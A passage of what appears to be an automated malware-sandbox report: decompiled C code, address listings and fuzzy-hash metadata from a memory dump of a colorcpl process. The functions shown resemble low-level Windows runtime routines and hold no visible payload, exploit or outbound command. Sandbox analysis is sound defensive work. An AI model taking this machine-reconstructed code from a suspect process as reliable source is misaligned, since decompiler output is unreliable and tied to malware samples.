							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x6f08628; // 0x0
						_t105 = _v28;
						_t80 =  *0x6f0862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x6edfb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                                                                0x06e3dbe9
                                                                                                0x06e3dbf2
                                                                                                0x06e3dbf7
                                                                                                0x06e3dbf9
                                                                                                0x06e3dbfc
                                                                                                0x06e3dc00
                                                                                                0x06e3dc03
                                                                                                0x06e3dc14
                                                                                                0x06e3dd54
                                                                                                0x06e3dd54
                                                                                                0x06e3dd54
                                                                                                0x06e3dc18
                                                                                                0x06e3dc1d
                                                                                                0x06e3dc1d
                                                                                                0x06e3dc32
                                                                                                0x06e3dc3b
                                                                                                0x06e3dc3e
                                                                                                0x06e3dc46
                                                                                                0x06e3dd5b
                                                                                                0x06e3dd62
                                                                                                0x06e3dd64
                                                                                                0x06e3dd67
                                                                                                0x06e3dd69
                                                                                                0x06e3dd6b
                                                                                                0x06e3dd6e
                                                                                                0x06e3dd70
                                                                                                0x06e3dd73
                                                                                                0x06e3dd73
                                                                                                0x00000000
                                                                                                0x06e3dc4c
                                                                                                0x06e3dc4e
                                                                                                0x06e83ae3
                                                                                                0x06e83ae8
                                                                                                0x06e83aea
                                                                                                0x06e3dce7
                                                                                                0x06e3dce9
                                                                                                0x06e3dcec
                                                                                                0x06e3dcee
                                                                                                0x06e3dcf0
                                                                                                0x06e3dcf3
                                                                                                0x06e3dcf5
                                                                                                0x06e83af2
                                                                                                0x06e83af5
                                                                                                0x06e83af5
                                                                                                0x06e3dd06
                                                                                                0x06e3dd08
                                                                                                0x06e3dd0b
                                                                                                0x06e3dd12
                                                                                                0x06e83b08
                                                                                                0x06e3dd18
                                                                                                0x06e3dd18
                                                                                                0x06e3dd18
                                                                                                0x06e3dd20
                                                                                                0x06e3dd23
                                                                                                0x06e83b16
                                                                                                0x06e83b16
                                                                                                0x06e3dd29
                                                                                                0x06e3dd2d
                                                                                                0x06e3dd36
                                                                                                0x06e3dd40
                                                                                                0x06e3dd51
                                                                                                0x06e3dd51
                                                                                                0x06e3dc54
                                                                                                0x06e3dc59
                                                                                                0x06e3dc59
                                                                                                0x06e3dc5e
                                                                                                0x06e3dc5e
                                                                                                0x06e3dc63
                                                                                                0x06e3dc66
                                                                                                0x06e3dc6b
                                                                                                0x06e3dc78
                                                                                                0x06e3dc7b
                                                                                                0x06e3dc81
                                                                                                0x06e3dc81
                                                                                                0x06e3dc83
                                                                                                0x06e3dc89
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e3dd7b
                                                                                                0x06e3dd7b
                                                                                                0x06e3dc8f
                                                                                                0x06e3dc8f
                                                                                                0x06e3dc92
                                                                                                0x06e3dc99
                                                                                                0x06e3dc9f
                                                                                                0x06e3dca5
                                                                                                0x06e3dcaa
                                                                                                0x06e3dcaa
                                                                                                0x06e3dcb3
                                                                                                0x06e3dcb8
                                                                                                0x06e3dcbb
                                                                                                0x06e3dcc1
                                                                                                0x06e3dccf
                                                                                                0x06e3dcd2
                                                                                                0x06e3dcd5
                                                                                                0x06e3dcd7
                                                                                                0x06e3dcda
                                                                                                0x06e3dcdc
                                                                                                0x06e3dcdc
                                                                                                0x06e3dce2
                                                                                                0x06e3dce4
                                                                                                0x00000000
                                                                                                0x06e3dce4

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b846dd8da2e5774de0ee4db6c1c5d8b0da65c39c135bfdb74881a533e28436a4
                                                                                                • Instruction ID: 20fad7a23f6044b33918b51dfa43626aed0df0a330fb9e17142c25cdf4f2a0a5
                                                                                                • Opcode Fuzzy Hash: b846dd8da2e5774de0ee4db6c1c5d8b0da65c39c135bfdb74881a533e28436a4
                                                                                                • Instruction Fuzzy Hash: C05190B1E00725CFCB94DFA8C8846AEB7F6BF48314F219659D559AB340DB30A944CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E2EF40 Relevance: .1, Instructions: 147COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 96%
                                                                                                			E06E2EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E06E19080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7709c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E06E12D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                                                                0x06e2ef4b
                                                                                                0x06e2ef4d
                                                                                                0x06e2ef57
                                                                                                0x06e2f0bd
                                                                                                0x06e2f0c2
                                                                                                0x06e2f0d2
                                                                                                0x06e2f0d2
                                                                                                0x06e2f0c2
                                                                                                0x06e2ef5d
                                                                                                0x06e2ef5f
                                                                                                0x06e2ef67
                                                                                                0x06e2ef6a
                                                                                                0x06e2ef6d
                                                                                                0x06e2ef74
                                                                                                0x06e2ef7f
                                                                                                0x06e2ef82
                                                                                                0x06e2ef82
                                                                                                0x06e2ef86
                                                                                                0x06e2ef88
                                                                                                0x06e2ef8c
                                                                                                0x06e2ef8f
                                                                                                0x06e2ef8f
                                                                                                0x06e2ef8f
                                                                                                0x00000000
                                                                                                0x06e2ef91
                                                                                                0x06e2ef93
                                                                                                0x06e2efc4
                                                                                                0x06e2efc4
                                                                                                0x06e2efc4
                                                                                                0x06e2efca
                                                                                                0x06e2efd0
                                                                                                0x06e2f0a6
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2f0af
                                                                                                0x06e7bb06
                                                                                                0x06e7bb0a
                                                                                                0x06e2f0b5
                                                                                                0x06e2f0b5
                                                                                                0x06e2f0b5
                                                                                                0x06e2f0b5
                                                                                                0x00000000
                                                                                                0x06e2efd6
                                                                                                0x06e2efd9
                                                                                                0x06e2f0de
                                                                                                0x06e2f0e2
                                                                                                0x06e2efdf
                                                                                                0x06e2efdf
                                                                                                0x06e2efdf
                                                                                                0x06e2efe5
                                                                                                0x06e7bafc
                                                                                                0x06e7bafc
                                                                                                0x06e2efe5
                                                                                                0x06e2efeb
                                                                                                0x06e2efed
                                                                                                0x06e2f00f
                                                                                                0x06e2f011
                                                                                                0x06e2f01a
                                                                                                0x06e2f01d
                                                                                                0x06e2f021
                                                                                                0x06e2f028
                                                                                                0x06e2f029
                                                                                                0x06e2f029
                                                                                                0x06e2f02c
                                                                                                0x00000000
                                                                                                0x06e2f02c
                                                                                                0x06e2eff3
                                                                                                0x06e2eff9
                                                                                                0x06e2f0ea
                                                                                                0x06e2f0ed
                                                                                                0x06e2f0ef
                                                                                                0x00000000
                                                                                                0x06e2f0ef
                                                                                                0x06e2f003
                                                                                                0x06e7bb12
                                                                                                0x06e2f045
                                                                                                0x06e2f049
                                                                                                0x06e2f051
                                                                                                0x06e2f09e
                                                                                                0x06e2f0a0
                                                                                                0x06e2f0a0
                                                                                                0x06e2f09e
                                                                                                0x06e2f053
                                                                                                0x06e2f064
                                                                                                0x06e2f064
                                                                                                0x06e2f06b
                                                                                                0x06e7bb1a
                                                                                                0x06e7bb1a
                                                                                                0x06e2f071
                                                                                                0x06e2f071
                                                                                                0x06e2f07d
                                                                                                0x06e2f082
                                                                                                0x06e2f08f
                                                                                                0x06e2f08f
                                                                                                0x06e2f009
                                                                                                0x06e2f00d
                                                                                                0x00000000
                                                                                                0x06e2f00d
                                                                                                0x06e2efd0
                                                                                                0x06e2ef97
                                                                                                0x06e2efa5
                                                                                                0x06e2efaa
                                                                                                0x00000000
                                                                                                0x06e2efac
                                                                                                0x06e2efac
                                                                                                0x06e2efac
                                                                                                0x00000000
                                                                                                0x06e2efb2
                                                                                                0x06e2f036
                                                                                                0x06e2f03a
                                                                                                0x06e2f040
                                                                                                0x06e2f090
                                                                                                0x00000000
                                                                                                0x06e2f092
                                                                                                0x06e2f042
                                                                                                0x00000000
                                                                                                0x06e2f042
                                                                                                0x06e2efb7
                                                                                                0x06e2efb9
                                                                                                0x06e2efbc
                                                                                                0x06e2efb0
                                                                                                0x06e2efb0
                                                                                                0x00000000
                                                                                                0x06e2efbe
                                                                                                0x06e2efbe
                                                                                                0x06e2efc1
                                                                                                0x00000000
                                                                                                0x06e2efc1
                                                                                                0x06e2efbc
                                                                                                0x06e2efaa
                                                                                                0x06e2ef91

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                • Instruction ID: 506a36d1ebec4ee2e7e8d4f8b5a8f72f6ff289c0e22d71e9bf3c8873fc323c24
                                                                                                • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                                                                • Instruction Fuzzy Hash: 6851F530E0436ADFEB90CB64D1D0BEEBBB3AF05318F2891A8C44557281D375A989C791
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06EE740D Relevance: .1, Instructions: 141COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 84%
                                                                                                			E06EE740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E06E6D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E06E5F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L06E34620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L06E34620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E06E5F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L06E34620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                                                                                0x06ee740d
                                                                                                0x06ee740d
                                                                                                0x06ee7412
                                                                                                0x06ee7413
                                                                                                0x06ee7416
                                                                                                0x06ee7418
                                                                                                0x06ee741c
                                                                                                0x06ee741f
                                                                                                0x06ee7422
                                                                                                0x06ee7422
                                                                                                0x06ee7428
                                                                                                0x06ee742a
                                                                                                0x06ee742a
                                                                                                0x06ee7451
                                                                                                0x06ee7432
                                                                                                0x06ee744f
                                                                                                0x06ee744f
                                                                                                0x00000000
                                                                                                0x06ee7434
                                                                                                0x06ee7438
                                                                                                0x06ee7443
                                                                                                0x06ee7517
                                                                                                0x06ee7517
                                                                                                0x06ee751a
                                                                                                0x06ee7535
                                                                                                0x06ee7520
                                                                                                0x06ee7527
                                                                                                0x06ee752c
                                                                                                0x06ee7531
                                                                                                0x06ee7533
                                                                                                0x00000000
                                                                                                0x06ee7533
                                                                                                0x00000000
                                                                                                0x06ee7531
                                                                                                0x06ee754b
                                                                                                0x06ee754f
                                                                                                0x06ee755c
                                                                                                0x06ee755c
                                                                                                0x06ee755f
                                                                                                0x06ee7560
                                                                                                0x06ee7561
                                                                                                0x06ee7562
                                                                                                0x06ee7563
                                                                                                0x06ee7568
                                                                                                0x06ee756a
                                                                                                0x06ee756c
                                                                                                0x06ee756d
                                                                                                0x06ee756d
                                                                                                0x06ee756f
                                                                                                0x06ee7572
                                                                                                0x06ee7574
                                                                                                0x06ee7577
                                                                                                0x06ee757c
                                                                                                0x06ee757f
                                                                                                0x00000000
                                                                                                0x06ee7551
                                                                                                0x06ee7551
                                                                                                0x06ee7551
                                                                                                0x06ee7553
                                                                                                0x06ee7553
                                                                                                0x06ee7449
                                                                                                0x06ee7449
                                                                                                0x06ee744c
                                                                                                0x06ee744c
                                                                                                0x00000000
                                                                                                0x06ee744c
                                                                                                0x06ee7443
                                                                                                0x06ee750e
                                                                                                0x06ee7514
                                                                                                0x06ee7514
                                                                                                0x06ee7455
                                                                                                0x06ee7469
                                                                                                0x06ee746d
                                                                                                0x00000000
                                                                                                0x06ee7473
                                                                                                0x06ee7473
                                                                                                0x06ee7476
                                                                                                0x06ee7480
                                                                                                0x06ee7484
                                                                                                0x06ee748e
                                                                                                0x06ee7493
                                                                                                0x06ee7493
                                                                                                0x06ee7496
                                                                                                0x06ee7499
                                                                                                0x06ee74a1
                                                                                                0x06ee74b1
                                                                                                0x06ee74b5
                                                                                                0x00000000
                                                                                                0x06ee74bb
                                                                                                0x06ee74c1
                                                                                                0x06ee74c1
                                                                                                0x06ee74c4
                                                                                                0x06ee74c5
                                                                                                0x06ee74c6
                                                                                                0x06ee74c7
                                                                                                0x06ee74c8
                                                                                                0x06ee74cd
                                                                                                0x00000000
                                                                                                0x06ee74d3
                                                                                                0x06ee74d3
                                                                                                0x06ee74d6
                                                                                                0x06ee74d8
                                                                                                0x06ee74db
                                                                                                0x06ee74dd
                                                                                                0x06ee74e0
                                                                                                0x06ee74e7
                                                                                                0x06ee74ee
                                                                                                0x06ee74ee
                                                                                                0x06ee74f4
                                                                                                0x06ee74f9
                                                                                                0x00000000
                                                                                                0x06ee74fb
                                                                                                0x06ee74fb
                                                                                                0x06ee74fd
                                                                                                0x06ee7500
                                                                                                0x06ee7503
                                                                                                0x06ee7505
                                                                                                0x06ee7505
                                                                                                0x06ee74f9
                                                                                                0x00000000
                                                                                                0x06ee74cd
                                                                                                0x06ee74b5
                                                                                                0x00000000

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                • Instruction ID: 84a8e86679dab1b6bb9b5f12b6ddede42d4c21b60f3d5c0c83f0d5aa5012db81
                                                                                                • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                                                                                • Instruction Fuzzy Hash: 2F518B71A00606EFDB55CF54C880A96BBF9FF45308F15C0AAE9089F256E371E94ACB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E42990 Relevance: .1, Instructions: 133COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 97%
                                                                                                			E06E42990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x6eeff00);
				E06E6D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x6df1664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E06E5E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x6df1668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E06E951BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x6df166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E06E42AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E06E26600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E06E42C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E06E2EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E06E42AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E06E42C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E06E42ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E06E6D0D1(_t62);
				goto L28;
			}





















                                                                                                0x06e42990
                                                                                                0x06e42992
                                                                                                0x06e42997
                                                                                                0x06e429a3
                                                                                                0x06e429a6
                                                                                                0x06e429ab
                                                                                                0x06e429ad
                                                                                                0x06e429b2
                                                                                                0x06e85c80
                                                                                                0x06e429b8
                                                                                                0x06e429b8
                                                                                                0x06e429bb
                                                                                                0x06e429c0
                                                                                                0x06e429c5
                                                                                                0x06e429c6
                                                                                                0x06e429c6
                                                                                                0x06e429cb
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e429cd
                                                                                                0x06e429d0
                                                                                                0x06e429d9
                                                                                                0x06e429db
                                                                                                0x06e429dd
                                                                                                0x06e42a7f
                                                                                                0x06e42a84
                                                                                                0x06e42a87
                                                                                                0x06e42a89
                                                                                                0x06e85ca1
                                                                                                0x06e85ca3
                                                                                                0x00000000
                                                                                                0x06e42a8f
                                                                                                0x06e42a8f
                                                                                                0x00000000
                                                                                                0x06e42a8f
                                                                                                0x00000000
                                                                                                0x06e429e3
                                                                                                0x06e429e3
                                                                                                0x06e429e3
                                                                                                0x00000000
                                                                                                0x06e429e3
                                                                                                0x06e429dd
                                                                                                0x00000000
                                                                                                0x06e429db
                                                                                                0x06e429e6
                                                                                                0x06e429e9
                                                                                                0x06e429eb
                                                                                                0x06e429ed
                                                                                                0x06e429f3
                                                                                                0x06e429f5
                                                                                                0x06e429f8
                                                                                                0x06e429fa
                                                                                                0x06e42a97
                                                                                                0x06e42a9a
                                                                                                0x06e42a9d
                                                                                                0x06e42add
                                                                                                0x00000000
                                                                                                0x06e42a9f
                                                                                                0x06e42aa2
                                                                                                0x06e42aa5
